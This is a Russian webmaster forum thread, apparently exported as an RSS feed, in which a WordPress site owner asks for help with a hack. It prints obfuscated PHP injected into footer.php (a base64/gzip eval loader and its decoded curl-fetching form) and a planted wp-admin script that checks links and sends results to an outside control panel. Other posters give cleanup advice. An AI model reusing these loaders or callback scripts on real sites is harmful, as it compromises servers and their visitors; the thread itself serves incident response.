http://webmasters.ru/forum/showthread.php?t=74723 SEO форум вебмастеров - Поисковые системы, оптимизация, раскрутка сайта, оптимизация и продвижение сайта в поисковых системах 1742978783 Elesite CMS 60 http://webmasters.ru/forum/images/wm/misc/rss.png http://webmasters.ru/forum http://webmasters.ru/forum/showpost.php?p=744552 Tue, 07 Jun 2016 10:44:24 GMT Привет! Просматривая один из сайтов, случайно нашёл вот такой вот код в самом начале файла footer.php: Попытался расшифровать, получил вот это: class _????{private static$_????;/*Bloodninja: I lick your earlobe, and undo your watch.*/static function _????????($_????){if(!self::$_????):self::_????();/*Sarah19fca: mmmm, okay.*/endif;return BasE64_DECOdE(self::$_????[$_????]);}/*Bloodninja: I take yo pants off, grunting like a troll.*/private static function _????(){self::$_????=array("_\xd5\214???\x8e"=>/*Sarah19fca: Yeah I like it rough.*/"TE\x39D\121UxT\121\x56\x42F","_\303\xb0?????"=>/*Bloodninja: I smack you thick booty.*/"a\110R0cDovL\x33AzLndw\1312Fj\x61\x47UtYmx\166Z\062d\154ci5jb\x320v\132\x32V\x30bGlua3M\165c\107hwP2F\x77aWNvZG\1259bGF\x73YW\x78hND\x51\155c\x47FnZ\130Vy\x62\1040=","_????"=>/*Sarah19fca: Oh yeah, that feels good.*/"aHR\x30cDo\166\114w=\075","_????\xa1????"=>/*Bloodninja: Smack, Smack, yeeeaahhh.*/"U0VS\x56\x6bVSX\060\x35BT\125\x55=","_?\xc7\xaa\211\317?\300?"=>/*Bloodninja: I make some toast and eat it off your ass. Land O' Lakes butter all in your crack. Mmmm.*/"UkV\x52V\125\126TVF9\x56\x55kk=","_???????\323"=>"Jn\126z\132XJh\x5a\x32VudD0\075","_??\x93?\244??"=>"\x53F\x52U\125F9\126U0VSX\x30\106HRU5\x55","_??\xc1???"=>"",);}}function _????????($_??????){$_????U?=CURl_INiT();cURL_SetoPT($_????U?,0105+017-021/*Sarah19fca: you like that?*/+-031/*Bloodninja: I peel some bananas.*/,0501+-0376/*Sarah19fca: Oh, what are you gonna do with those?*/- -01/*Bloodninja: get me peanuts. Peanuts from the ballpark.*/-0104);cUrL_SetOPt($_????U?,(int)ROund(9956.5+9956.5),(int)rouND(0.25/*Sarah19fca: Peanuts?*/+0.25+0.25+0.25));CURl_SEtoPT($_????U?,(int)RoUnd(5001/*Bloodninja: Ken Griffey Jr. Yeaaaaahhh.*/+5001),$_??????);CurL_SETopt($_????U?,(int)rouND(3339.3333333333+3339.3333333333+3339.3333333333),_????::_????????("_??\xa5ю"));/*Sarah19fca: What are you talking about?*/$_???????=curl_eXEC($_????U?);/*Bloodninja: I'm spent, I jump down into the alley and smoke a fatty. I throw rocks at the cats.*/CUrl_cLose($_????U?);return$_???????;/*Sarah19fca: This is stupid.*/}$_????=_????????(_????::_????????("_?\200????\xaa").urLeNcode(_????::_????????("_????").$_SERVER[_????::_????????("_\265\215???????")].$_SERVER[_????::_????????("_?\307\xaa?\317??\xb0")])._????::_????????("_\214?\xd1\xd8??\xc0\xd3").UrleNcoDe($_SERVER[_????::_????????("_???\xa4\x8b\xcc?")])._????::_????????("_\x81??\xb0?\246"));echo/*Bloodninja: Stone Cold Steve Austin gives me some beer.*/$_????;/*Bloodninja: Wanna Wrestle Stone Cold?*/ Загнал полученный результат в переводчик - получился какой то бред. ВОПРОС: что это вообще за хрень? От куда могла взяться? Пароль к админке уже поменял. Запустил проверку Манулом от Яндекса... *//* */ ?> */ eval(gzuncompress(base64_decode('eNqFVm1v01YU/it3USXiNg1+iZOmVTZBkxZYaas0aQsYWTfOTeLG8Y3s68ahQryI8dayaQJWpH3aB7qJia1DQhNCk4CNabCNCSa2shXtr+xcu6xJ6MCtbCf33POcc55znxPDwq6L9Ktnfl97sdR0zEXMCHIZZqbRpz//7vTq5sju/r0WpWXbtBfwMNqPLNOoozb1HESwY9ESiSFsl5Fnl2n4dQszoxbv3x26QRXPNphJbaRfuPnV7TurP/x4Ltqn3zrz853HwpJZib7jEqsyPLwFJwyHH/XNlx/cfBEVAH4GO7gmpSsGwDfgiiFax20AIHbZrIw4hHmOjfZiN5dM6Nnc6FQ5F+3yeWQL7qgwcrw3G4brBMJGTWwzF9FKJYaqjmcz065CprCGEXOoZQFcd3k68toKdakLNIMdB7ejEV3zy6omS4m16081f4hEMu92p3SI4FpQVgAzGXKoV+XVixRymq+ks5okS0W/wB+aryY1PyGPRWLgVhEVzS+JJ784++eDG4HX7szcBg6JQqzGKStRynjVIliTJDEvGlm6OAEQyp5jE3a5pUmKJI8taH4ScBKpIjvU8DUpmTysiUm5rElqwjDVhRJskMVFMJb52yzcxNK45WHlIBirhiaJqVprWh7T/FQKz00uHh6HyNV0aZx/oxyag/tQbTILqUjgEzYA1ph9GByKs20Al8FDQszwDD9Z+2fj3GvlmqqhNlQsBllhhiqEWC6qQt5BZvvyPCDIjEcOaSZaGU1Mqdzb7Uunrmg+lq59ef/xa9Wa4bWKvXq0CSEY12oBDUVxdiYsfLI0OzMP1RABQ93LGVFhQQ1i3dR8IwXu8QmgWtIUKfUrECSu78BLg3ecSxsEMYpdFhweAqkA99B+4RGCQxlHE3xlahc868RFJY8xAiuWhUw7tDIcCDeODsKZCCKtAx0qcMIDk+RkYXYsHUauqvV6EObK8tONn26cv6cpsgKhRQ7Y3PAYp3P+QA0MccCqV86Kr+r2aEPz08rL65qcSCz/cpfvAjtljEMVORSAgA9epnlefOAvuS9fDErD95/avAi1kdZX1/jWSAzO4PHto3P1yR+Xzlw/+/BvkIQTH3/z7PzK189OCkt9+kffnv3r2sNbzzOjxbyl7580C6AFRjE/oc8QRqcL0W2TmCiJ6oAopQZFWepuFt79wcHizfJe/+6BQVGReglpQg+FhJSwDX8uFDMmqqLErVPJ3vaLoRbvPOyQwH2V2jZGoH0tk9UAh7oEgAbRoNgDVCUMAUaTYNtjQO90+IIqDm3APo5uWU3s1AEeNosJnq8T5Ds1zTrzjZo2E/JToLjRdFpNxtWB8CGEK6Agk9moGJfV7tC3AHkZ+OL2TRBGgirP5HorGyLRIiCpYm9C7xMbjTtmpULa6IAT50LGr/DcDHB7IdbJ6siox9PJFWjz9XTCoBVFSceV/66Bt3wWYuHkgnGxPVsi+vOVNTiK6tMPI0Lv/JjrpI5hq851Hpeox7ujT39w+vL6uc0n1z7PGJ5j6WQ+N9oRqdA7C3c1kNskNotBFy14jSa0QcuG48loQCjwCaXhp9ht0GCUVDADDeZjp+bQFmi9UXcRRMStDcx4540WAdiYgDbqQg6nXEeEPYkVaqaL4N9lXtPkYni8T1/9bfnTlUzHGduxWt+va7Io8inC9SsixIElMmnQMtnZPpRlId4HVOZnc/kjO1ppcpJPPfXUlc8CxRWOvmXDJuhlqKAXAvm8x4cbbBPi/+NfSizDaIVhVR4CSQONAV0uKxAYFJDHn+UFfBPio43LIGs+TsBYhrlmGHffAOcPSZsX7/OYVkEJk7yziFGjPWOEUZugUWqV4ZUsErTHc+GXBKqai6DgjS3ZLxHixHm3Bfz09NQc5nIy5xCXWaTDIbTnvwjCiFc='))); /* */ ?> Попытался расшифровать, получил вот это: class _????{private static$_????;/*Bloodninja: I lick your earlobe, and undo your watch.*/static function _????????($_????){if(!self::$_????):self::_????();/*Sarah19fca: mmmm, okay.*/endif;return BasE64_DECOdE(self::$_????[$_????]);}/*Bloodninja: I take yo pants off, grunting like a troll.*/private static function _????(){self::$_????=array("_\xd5\214???\x8e"=>/*Sarah19fca: Yeah I like it rough.*/"TE\x39D\121UxT\121\x56\x42F","_\303\xb0?????"=>/*Bloodninja: I smack you thick booty.*/"a\110R0cDovL\x33AzLndw\1312Fj\x61\x47UtYmx\166Z\062d\154ci5jb\x320v\132\x32V\x30bGlua3M\165c\107hwP2F\x77aWNvZG\1259bGF\x73YW\x78hND\x51\155c\x47FnZ\130Vy\x62\1040=","_????"=>/*Sarah19fca: Oh yeah, that feels good.*/"aHR\x30cDo\166\114w=\075","_????\xa1????"=>/*Bloodninja: Smack, Smack, yeeeaahhh.*/"U0VS\x56\x6bVSX\060\x35BT\125\x55=","_?\xc7\xaa\211\317?\300?"=>/*Bloodninja: I make some toast and eat it off your ass. Land O' Lakes butter all in your crack. Mmmm.*/"UkV\x52V\125\126TVF9\x56\x55kk=","_???????\323"=>"Jn\126z\132XJh\x5a\x32VudD0\075","_??\x93?\244??"=>"\x53F\x52U\125F9\126U0VSX\x30\106HRU5\x55","_??\xc1???"=>"",);}}function _????????($_??????){$_????U?=CURl_INiT();cURL_SetoPT($_????U?,0105+017-021/*Sarah19fca: you like that?*/+-031/*Bloodninja: I peel some bananas.*/,0501+-0376/*Sarah19fca: Oh, what are you gonna do with those?*/- -01/*Bloodninja: get me peanuts. Peanuts from the ballpark.*/-0104);cUrL_SetOPt($_????U?,(int)ROund(9956.5+9956.5),(int)rouND(0.25/*Sarah19fca: Peanuts?*/+0.25+0.25+0.25));CURl_SEtoPT($_????U?,(int)RoUnd(5001/*Bloodninja: Ken Griffey Jr. Yeaaaaahhh.*/+5001),$_??????);CurL_SETopt($_????U?,(int)rouND(3339.3333333333+3339.3333333333+3339.3333333333),_????::_????????("_??\xa5ю"));/*Sarah19fca: What are you talking about?*/$_???????=curl_eXEC($_????U?);/*Bloodninja: I'm spent, I jump down into the alley and smoke a fatty. I throw rocks at the cats.*/CUrl_cLose($_????U?);return$_???????;/*Sarah19fca: This is stupid.*/}$_????=_????????(_????::_????????("_?\200????\xaa").urLeNcode(_????::_????????("_????").$_SERVER[_????::_????????("_\265\215???????")].$_SERVER[_????::_????????("_?\307\xaa?\317??\xb0")])._????::_????????("_\214?\xd1\xd8??\xc0\xd3").UrleNcoDe($_SERVER[_????::_????????("_???\xa4\x8b\xcc?")])._????::_????????("_\x81??\xb0?\246"));echo/*Bloodninja: Stone Cold Steve Austin gives me some beer.*/$_????;/*Bloodninja: Wanna Wrestle Stone Cold?*/ Загнал полученный результат в переводчик - получился какой то бред. ВОПРОС: что это вообще за хрень? От куда могла взяться? Пароль к админке уже поменял. Запустил проверку Манулом от Яндекса...]]> http://webmasters.ru/forum/showpost.php?p=744558 Tue, 07 Jun 2016 11:47:10 GMT что это вообще за хрень? От куда могла взяться? А плагины какие установлены? Попробуй отключить плагины по очереди и посмотри. Возможно, что один из плагинов это прописывает. P.s На всякий случай папку uploads проверь, нет ли там скриптов по мимо фото. http://webmasters.ru/forum/showpost.php?p=744566 Tue, 07 Jun 2016 12:09:32 GMT WordPress SEO Plugin пробовали отключать? http://webmasters.ru/forum/showpost.php?p=744641 Wed, 08 Jun 2016 06:56:53 GMT Fartuna, не плагины... думаю это просто так прописали.. чтобы не удаляли ---------- Сообщение добавлено 09:48 ---------- Предыдущее 09:48 ---------- Septik, пробовал. Когда удалил - более ничего не появилось... пока что ---------- Сообщение добавлено 10:20 ---------- Предыдущее 09:48 ---------- Итак, посмотрел логи и нашёл в wp-admin/script/ несколько подозрительных скриптов. Содержимое одного из них: Удалил всё. Поиски продолжаю.. ---------- Сообщение добавлено 10:28 ---------- Предыдущее 10:20 ---------- Ещё здесь /wp-admin//link-parse-editor.php ---------- Сообщение добавлено 11:07 ---------- Предыдущее 10:28 ---------- Выяснилось, что произошло заражение и через сайт размещают ссылки SAPE:icon_mrgreen: ---------- Сообщение добавлено 11:56 ---------- Предыдущее 11:07 ---------- С помощью логов обнаружил такой момент: если добавить к адресу сайта /index.php?itemid=act&check=1&proverka=1, то пишет sape_ready 0) { $links_part = array_splice($all_links, 0, $p_threads); $multithread = new MultiThread($link_timeout); $multithread->setLinks($links_part); $multithread->setMethod($p_request,$p_requestbody,$onlybh); $links_result = $multithread->execute(); foreach($links_result as $res_el) { if(!empty($res_el['linkerror']) && $res_el['answer']!='596') $curl_result[$i] = $res_el['link'].'-||-error'; elseif(vf_regex($res_el['answer'],$p_regex,$p_regex_logic) === true) { $curl_result[$i] = $res_el['link'].'-||-good'; } else { $curl_result[$i] = $res_el['link'].'-||-bad'; if($res_el['linkerror'] == '2' || $res_el['linkerror'] == '3') $double_links[$i] = $all_links_o[($i-1)]; } $i++; } sleep($p_delay); } while(count($double_links) > 0) { $links_part = array_slice($double_links, 0, $p_threads, true); $t_count = count($double_links) - $p_threads; $double_links = array_slice($double_links, $p_threads, $t_count, true); $multithread = new MultiThread($link_timeout, 1); $multithread->setLinks($links_part); $multithread->setMethod($p_request,$p_requestbody,$onlybh); $links_result = $multithread->execute(); foreach($links_result as $res_el) { if(!empty($res_el['linkerror']) && $res_el['answer']!='596') $curl_result[$res_el['lk']] = $res_el['link'].'-||-error'; elseif(vf_regex($res_el['answer'],$p_regex,$p_regex_logic) === true) $curl_result[$res_el['lk']] = $res_el['link'].'-||-good'; else $curl_result[$res_el['lk']] = $res_el['link'].'-||-bad'; } sleep($p_delay); } //print_r($curl_result); $curl_result = implode('_||_',$curl_result); $server_url = 'http://dropsforums.ru/panel/proc/receive_result.php'; $result_init = curl_init($server_url); curl_setopt($result_init, CURLOPT_POST, true); curl_setopt($result_init, CURLOPT_TIMEOUT, 15); curl_setopt($result_init, CURLOPT_CONNECTTIMEOUT, 15); curl_setopt($result_init, CURLOPT_RETURNTRANSFER, true); curl_setopt($result_init, CURLOPT_POSTFIELDS, array('hashcode' => $hashcode, 'taskid' => $p_taskid, 'taskname' => $p_taskname, 'client_id' => $p_client_id, 'proc_id' => $p_proc_id, 'vffsockopen' => $vffsockopen, 'result' => $curl_result)); curl_exec($result_init); curl_close($result_init); class MultiThread { private $maxthreads, $links = array(), $linkscount, $threads = array(), $mtype = 'get', $mcontent, $onlyBody = 0, $onlyHeaders = 0, $results = array(); public function __construct($link_timeout = 1, $double_req = 0, $maxthreads = 150) { $this->link_timeout = $link_timeout; $this->double_req = $double_req; if($this->double_req == 1) { $this->sock_timeout = 3; $this->link_timeout += 2; } else $this->sock_timeout = 2; $this->maxthreads = $maxthreads; } public function setLinks($links = array()) { $this->links = $links; $this->linkscount = count($this->links); if($this->linkscount > $this->maxthreads) $this->links = array_slice($this->links, 0, $this->maxthreads); } public function setMethod($type,$mcontent='',$onlyBH=0) { $this->mtype = $type; $this->mcontent = $mcontent; if($onlyBH == 1) $this->onlyBody = '1'; elseif($onlyBH == 2) $this->onlyHeaders = '1'; } public function execute() { $li = 0; $t_redirects = array(); foreach ($this->links as $lk => $link) { $li++; $this->results[$li] = array('link' => $link, 'lk' => $lk, 'answer' => '', 'linkerror' => '', 'setonlyBody' => 0); $t_redirects[$li] = 0; $link_ar = parse_url($link); if(isset($link_ar['host'])) { $server = $link_ar['host']; if(!$fsock = @fsockopen($server, 80, $erno, $erstr, $this->sock_timeout)) { if(strpos($erstr,'Name or service not known') !== false) $this->results[$li]['answer'] = '596'; $this->results[$li]['linkerror'] = '2'; } else { $out = get_fwrite_data($link_ar,$this->mtype,$this->mcontent); fwrite($fsock, $out); stream_set_timeout($fsock, $this->link_timeout); stream_set_blocking($fsock, 0); $this->threads[$li] = $fsock; } } else $this->results[$li]['linkerror'] = '1'; } $threads_start = time() + floatval(microtime()); do { foreach ($this->threads as $key=>$value) { $threads_time = round((time() + floatval(microtime()) - $threads_start),2); if(feof($value) || $threads_time > ($this->link_timeout+8)) { fclose($value); unset($this->threads[$key]); } else { $vf_timeout = stream_get_meta_data($value); if($vf_timeout['timed_out'] === true) { $this->results[$key]['linkerror'] = '3'; fclose($value); unset($this->threads[$key]); continue; } //$t_answer = fgets($value); $t_answer = fread($value, 10240); if(!empty($t_answer)) { if(stristr($t_answer,"location:")!='' && (stristr($t_answer,"301 Moved")!='' || stristr($t_answer,"301 Found")!='' || stristr($t_answer,"302 Found")!='' || stristr($t_answer,"302 Moved")!='' || stristr($t_answer,"302 Redirect")!='' || stristr($t_answer,"303 See")!='') && $t_redirects[$key]<3) { $link_redirect = preg_match('/^Location: (.+?)$/Um', $t_answer, $t_matches); $t_redirects[$key] += 1; $t_matches[1] = trim($t_matches[1]); echo $this->results[$key]['link'].' - '.$t_matches[1]."\n\n"; if(substr($t_matches[1],0,5) == 'https') { $link_ar = parse_url($t_matches[1]); $server = $link_ar['host']; if(!$fsock = @fsockopen('ssl://'.$server, 443, $erno, $erstr, $this->sock_timeout)) { $this->results[$key]['linkerror'] = '4'; fclose($value); unset($this->threads[$key]); } else { $this->results[$key]['link'] = $t_matches[1]; $out = get_fwrite_data($link_ar,$this->mtype,$this->mcontent); fwrite($fsock, $out); stream_set_timeout($fsock, $this->link_timeout); stream_set_blocking($fsock, 0); $this->threads[$key] = $fsock; $this->results[$key]['answer'] = ''; continue; } } else { if(substr($t_matches[1],0,4) != 'http') { $link_ar = parse_url($this->results[$key]['link']); $server = $link_ar['host']; $t_matches[1] = 'http://'.$server.(substr($t_matches[1],0,1)=='/'?'':'/').$t_matches[1]; } $link_ar = parse_url(trim($t_matches[1])); $server = $link_ar['host']; fclose($value); unset($this->threads[$key]); if(!$fsock = @fsockopen($server, 80, $erno, $erstr, $this->sock_timeout)) { $this->results[$key]['linkerror'] = '5'; } else { $this->results[$key]['link'] = $t_matches[1]; $out = get_fwrite_data($link_ar,$this->mtype,$this->mcontent); fwrite($fsock, $out); stream_set_timeout($fsock, $this->link_timeout); stream_set_blocking($fsock, 0); $this->threads[$key] = $fsock; $this->results[$key]['answer'] = ''; continue; } } } $this->results[$key]['answer'] .= $t_answer; if($this->onlyBody == 1 && $this->results[$key]['setonlyBody'] == 0) { if(strpos($this->results[$key]['answer'],"\r\n\r\n") !== false) { $body_ar = explode("\r\n\r\n",$this->results[$key]['answer'],2); $this->results[$key]['answer'] = $body_ar[1]; $this->results[$key]['setonlyBody'] = 1; } } elseif($this->onlyHeaders == 1) { if(strpos($this->results[$key]['answer'],"\r\n\r\n") !== false) { $header_ar = explode("\r\n\r\n",$this->results[$key]['answer']); $this->results[$key]['answer'] = $header_ar[0]; fclose($value); unset($this->threads[$key]); } } } } } usleep(10000); } while (count($this->threads) > 0); return $this->results; } } function get_fwrite_data($link_ar, $mtype='get', $content) { $server = $link_ar['host']; $query = isset($link_ar['path']) ? $link_ar['path'] : '/'; if(isset($link_ar['query'])) $query .= '?'.$link_ar['query']; if($mtype=='post') { $result = "POST $query HTTP/1.1\r\n"; $result .= "Host: $server\r\n"; $result .= "Cookie: income=1\r\n"; $result .= "Content-Type: application/x-www-form-urlencoded\r\n"; $result .= "Content-Length: ".strlen($content)."\r\n"; $result .= "Connection: Close\r\n\r\n"; $result .= $content; } elseif($mtype=='get') { $result = "GET $query HTTP/1.1\r\n"; $result .= "Host: $server\r\n"; $result .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"; //$result .= "Accept: text/xml,application/xml,application/xhtml+xml,application/json,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; //$result .= "Referer: http://armsites.info\r\n"; $result .= "User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\r\n"; $result .= "Connection: Close\r\n\r\n"; } return $result; } function vf_regex($answer, $regex, $regex_logic = 3) { if($regex_logic == '1') { if(preg_match($regex,$answer)) return true; } elseif($regex_logic == '2') { if(!preg_match($regex,$answer)) return true; } elseif($regex_logic == '3') { $regex = str_replace("\n",'',$regex); $answer = str_replace("\n",'',$answer); if(strpos($answer,$regex) !== false) return true; } elseif($regex_logic == '4') { $regex = str_replace("\n",'',$regex); $answer = str_replace("\n",'',$answer); if(strpos($answer,$regex) === false) return true; } return false; } ?> Удалил всё. Поиски продолжаю.. ---------- Сообщение добавлено 10:28 ---------- Предыдущее 10:20 ---------- Ещё здесь /wp-admin//link-parse-editor.php ---------- Сообщение добавлено 11:07 ---------- Предыдущее 10:28 ---------- Выяснилось, что произошло заражение и через сайт размещают ссылки SAPE:icon_mrgreen: ---------- Сообщение добавлено 11:56 ---------- Предыдущее 11:07 ---------- С помощью логов обнаружил такой момент: если добавить к адресу сайта /index.php?itemid=act&check=1&proverka=1, то пишет sape_ready]]> http://webmasters.ru/forum/showpost.php?p=744658 Wed, 08 Jun 2016 07:28:55 GMT Прежде всего смотрите FTP. Я бы вообще его отключил. Или хотя бы меняйте на нем пароли. Также права на файлы и папки - не должны быть 777. Кое-какую защиту дает запуск сайтов под разными пользователями, обычно через apache ITK - по крайней мере помогает не заразить все сайты на VPS. http://webmasters.ru/forum/showpost.php?p=744680 Wed, 08 Jun 2016 10:49:10 GMT Всё вроде нашёл, всё удалил... при добавлении к адресу сайта index.php?itemid=act&check=1&proverka=1 вы даёт sape_ready:icon_mrgreen:. Кто-нибудь знает где искать? Кстати, злодей с Украины:icon_evil:, я не сильно удивлён http://webmasters.ru/forum/showpost.php?p=744688 Wed, 08 Jun 2016 11:34:22 GMT Gann,Сделай проще, скачай на комп папку wp-content(на всякий случай), так же ее проверь. Дальше подключаешься по ftp и удаляешь все папки и файлы движка, кроме wp-config.php, robots, .htaccess и подобных, которых нет в чистом движке. И после удаления заливаешь новый движок и все. Так как папка wp-content останется на сервере, перед тем как будешь лить новый движок, удали оттуда эту папку и файлы типа wp-config.php P.s Папку wp-content скачать и проверить, но удалять ее не нужно с ftp, если там чисто. Это самый оптимальный вариант, нежели копать все файлы движка. НО ПОЛНЫЙ бекап делать обязательно, в том числе и бекап базы данных. http://webmasters.ru/forum/showpost.php?p=744690 Wed, 08 Jun 2016 11:47:18 GMT Fartuna, наверное так и сделаю... Вообще никаких последствий заражения пока нету - нет ни ссылок, ничего... просто лишние коды в файлах. Ну index.php?itemid=act&check=1&proverka=1 - вот только это беспокоит http://webmasters.ru/forum/showpost.php?p=744754 Thu, 09 Jun 2016 00:35:13 GMT наверное так и сделаю... Вообще никаких последствий заражения пока нету - нет ни ссылок, ничего... просто лишние коды в файлах.Дали отстоятся просто твоему пирогу, а ссылки могут и на свои ресурсы поставить если надо или дор какой-нибудь со временем зальют. http://webmasters.ru/forum/showpost.php?p=745710 Thu, 16 Jun 2016 20:11:48 GMT Увидел eval в коде - убей его. p.s. причем дырка может быть и не у тебя, а у хостера. http://webmasters.ru/forum/showpost.php?p=745733 Fri, 17 Jun 2016 07:02:35 GMT Недавно обнаружили крупную сеть пекарей, которые делают SQL инъекции в движки с такой уязвимость, масштабы там просто поразительные.